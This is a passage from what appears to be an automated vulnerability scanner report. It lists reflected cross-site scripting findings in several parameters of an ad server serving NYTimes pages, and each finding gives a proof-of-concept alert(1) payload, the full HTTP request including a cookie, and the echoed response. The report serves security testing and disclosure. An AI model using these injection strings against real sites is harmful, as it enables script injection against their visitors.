e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a42ca9"-alert(1)-"a08685d2013&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

4.16. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 340e4'-alert(1)-'7afe9285df0 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3340e4'-alert(1)-'7afe9285df0&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3340e4'-alert(1)-'7afe9285df0&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.17. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f591d"-alert(1)-"9e1f07ef07d was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3f591d"-alert(1)-"9e1f07ef07d&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3f591d"-alert(1)-"9e1f07ef07d&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

4.18. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b1aa'-alert(1)-'9131abe2505 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick6b1aa'-alert(1)-'9131abe2505&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick6b1aa'-alert(1)-'9131abe2505&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.19. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90c03"-alert(1)-"db085e619ba was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90c03"-alert(1)-"db085e619ba&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90c03"-alert(1)-"db085e619ba&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscrip
...[SNIP]...

4.20. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91c16'-alert(1)-'1145846c2df was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207291c16'-alert(1)-'1145846c2df&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207291c16'-alert(1)-'1145846c2df&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.21. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2bd3"-alert(1)-"fe005cef2e0 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072e2bd3"-alert(1)-"fe005cef2e0&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072e2bd3"-alert(1)-"fe005cef2e0&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "neve
...[SNIP]...

4.22. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60df'-alert(1)-'060f0b2a3b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotob60df'-alert(1)-'060f0b2a3b7&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotob60df'-alert(1)-'060f0b2a3b7&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60
...[SNIP]...

4.23. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48242"-alert(1)-"d0ace12d614 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto48242"-alert(1)-"d0ace12d614&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48242"-alert(1)-"d0ace12d614&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60
...[SNIP]...

4.24. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6ea6"-alert(1)-"8c77f1839e3 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptb6ea6"-alert(1)-"8c77f1839e3&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptb6ea6"-alert(1)-"8c77f1839e3&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fs
...[SNIP]...

4.25. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c87a2'-alert(1)-'1670f8dc654 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptc87a2'-alert(1)-'1670f8dc654&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptc87a2'-alert(1)-'1670f8dc654&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.26. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff51d'-alert(1)-'ce15ab17f86 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ff51d'-alert(1)-'ce15ab17f86&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
